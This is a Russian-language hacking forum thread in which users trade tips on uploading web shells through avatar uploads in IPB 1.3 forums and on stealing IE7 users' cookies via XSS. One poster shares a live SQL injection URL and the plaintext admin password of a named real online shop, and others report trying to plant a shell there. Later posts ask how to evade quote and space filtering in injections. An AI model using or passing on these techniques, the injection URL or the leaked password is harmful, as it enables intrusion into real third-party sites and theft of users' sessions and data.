То есть на форуме exemple.com залить шелл через загрузку аватары получается, а на форуме exemple2.com этого сделать не удается.
У вас вопрос почему собственно так происходить. Версия форума стандартная ipb 1.3 final. Особых отличии не вижу. Разве что в конфигурации сервера...

вероятно форум exemple2.com пропатчен

Может быть...а из-за настроек сервера такое может произойти? Я могу дать пару ссылок с пасса, попробуйте. Может, руки корявые у меня :(

вероятно форум exemple2.com пропатчен
не неси херни, просто не хватает прав на заливку в диру с аватарами

2 Ershik
кинь в пм, попробуем залить

всё используется, пасиба за линк =)
никакой благодарности :( Не за что....

хм, а в 1.3 разве нельзя злить через аватары, перед этим добавив в админке тип заливаемых файлов .phtml и MIME application/octet-stream?

Spyder, не пробовал. Тем более, что у администраторов стояли аватары через них не заливал. А лишнее "свечение в логах" я не хотел. Хотя не знаю, сейчас попробую. Получится, отпишусь.

не обязательно через админов, создай юзера левого и лей его аватар)

Пробовал. Не получилось.
gif,jpeg,jpg,swf,png, php. php4, phtml , MIME application/octet-stream Строка была такая.
Я не очень понял про MIME application/octet-stream, может в этом дело...но добавил разрешения для php
Пишет, что нельзя загружать аватары с таким разрешением. А когда заливал через смайлы, писал, что неудачная загрузка.

там ещё надо галочку поставить для загрузки как аватар
скинь в пм, попробую

Не знал куда точно написать, решил сюда :)

Может вопрос и задают в 1000 раз, но все же:
как тырить куки у IE 7 например, если я дам xss-ссылку, то ему пофиг, проверял сам, java-скрипты ваще не выполняет, может надо включить их еще)))не нашел, браузер просто Г, но народ юзает...так что придется и этот вариант рассматривать.
слышал про то, что в ie 7 не сможешь вызвать document.cookie; читал статьи про возможные обходы фишки...хотел бы узнать, как вы тут поступаете ;)
С меня ++

Нужна помощь в заливке шелла.
Есть доступ к кривой админке. и скуль. Мне просто интересно в образховательных целях что можно сделать дальше, если у кого получится, то выложите здесь подробное описание...

ЗЫ
http://www.kaprikorn-shop.co.uk/index1.php?cat=1&prod=3+union+selecе+1,2,3,4,5,6+from+information_ schema.tables/*

пасс к админке 01041972

http://www.kaprikorn-shop.co.uk/admin.php?pass=null
ггг, даж скуля не нужна, пасс в открытом виде
Щас посмотрим

Spyder, мы не ищем лёгких путей и достаем пасс из скули =)
Ждёмс...

посмотрел
в админке постоянно надо через гет запрос передавать &pass=01041972
Есть скрипт аплода картинок, судя по всему можно лить все файлы, но у меня не вышло. Вобщем залить наверное реально, но из-за того что там всё криво я не смог =)

Spyder аналогично действовал, ничего не получилось(я ещё post запросом пробовал), почему и прошу помощи...

Что делать когда экранируются кавычки??? Можна как-либо обойти??? Например видел где-то на форуме статтю о том как заменить кавычку специальным кодом. ХЕЛП

нет 0x27 - это код кавычки, такой код исполняется только при наличии БД, а при инъекции, используя hex или char(), сам знак кавычки не нужен

У меня целая куча вопросов:
как обходить фильтрацию пробелов в скуле? /**/ не катит.
Как зашифровывать символы, чтобы получилось что-то такое: 0x27 ?
Чем можно примконнектиться к БД, если знаешь логин и пароль (программка клиент есть? откуда скачать?). База Данных - МуСкул.

Всем спасибо кто поможет+++